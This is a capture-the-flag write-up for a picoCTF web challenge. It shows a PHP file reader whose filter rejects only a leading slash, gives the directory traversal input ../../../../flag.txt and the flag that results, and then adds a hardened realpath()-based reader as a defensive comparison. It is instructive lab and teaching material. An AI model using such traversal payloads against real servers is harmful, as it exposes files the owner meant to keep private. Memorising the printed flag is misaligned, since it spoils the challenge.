LT 'syreal' Jones
Can you get the flag?
Here's the website.
We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt, but the website is filtering absolute file paths. Can you get past the filter to read the flag?
If we put the name of any of the text files into the textbox, we will be able to see the contents of the file. We'll notice the request goes to read.php, so I decided to get the file reader to read read.php, which resulted in:
$firstChar = $_POST['filename'][0];
if( strcmp($firstChar, '/') == 0 )
{
    // Only the first character is inspected: a leading "/" is refused.
    echo "Not Authorized";
}
else
{
    // Any other input is used as a path as-is, relative to the web root.
    if (file_exists($_POST['filename'])) {
        $file = fopen($_POST['filename'], 'r');
        while(! feof($file))
        {
            $line = fgets($file);
            echo $line . "\n";
        }
        fclose($file);
    } else {
        echo "File does not exist";
    }
}
?>
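This code shows the contents of a file if the file exists. The only check is on the first character of the filename: a leading / is rejected, but any relative path is passed to fopen() unchanged. Now if we look at the description of the question, we can assume the folders to look something like this: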
.
├── usr
│   └── share
│       └── nginx
│           └── html
│               ├── index.php
│               ├── read.php
│               ├── divine-comedy.txt
│               ├── oliver-twist.txt
│               └── the-happy-prince.txt
└── flag.txt
This means that we need to navigate back 4 folders to reach flag.txt. Inputting ../../../../flag.txt into the text box will obtain the flag (.. means go back a directory).
picoCTF{7h3_p47h_70_5ucc355_26b22ab3}
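For comparison with the first-character check in read.php, here is a hardened reader as an added example (not part of the challenge's code): it canonicalizes the requested name with realpath() and serves it only if the result stays inside the base directory. The function name safe_read() and the temporary directory layout are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code): confine reads to a base directory.
// safe_read() and the temporary directory layout below are hypothetical.

function safe_read(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false if the
    // resulting path does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base *with* a trailing separator, so a sibling
    // directory such as /srv/html-old is not treated as inside /srv/html.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $data = file_get_contents($target);
    return $data === false ? null : $data;
}

// Constructed layout: <root>/flag.txt sits outside <root>/html,
// mirroring /flag.txt versus /usr/share/nginx/html/ on this page.
$root = sys_get_temp_dir() . '/fp_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/html', 0700, true);
file_put_contents($root . '/html/oliver-twist.txt', "sample book text\n");
file_put_contents($root . '/flag.txt', "constructed-secret\n");

$cases = ['oliver-twist.txt', '../flag.txt', './../html/../flag.txt', $root . '/flag.txt'];
foreach ($cases as $name) {
    $out = safe_read($root . '/html', $name);
    printf("%s => %s\n", $name, $out === null ? 'rejected' : 'served');
}
```

Only the first case is served. The check is made on the resolved path rather than on the characters of the input, so relative, absolute and mixed forms are all handled by the same comparison.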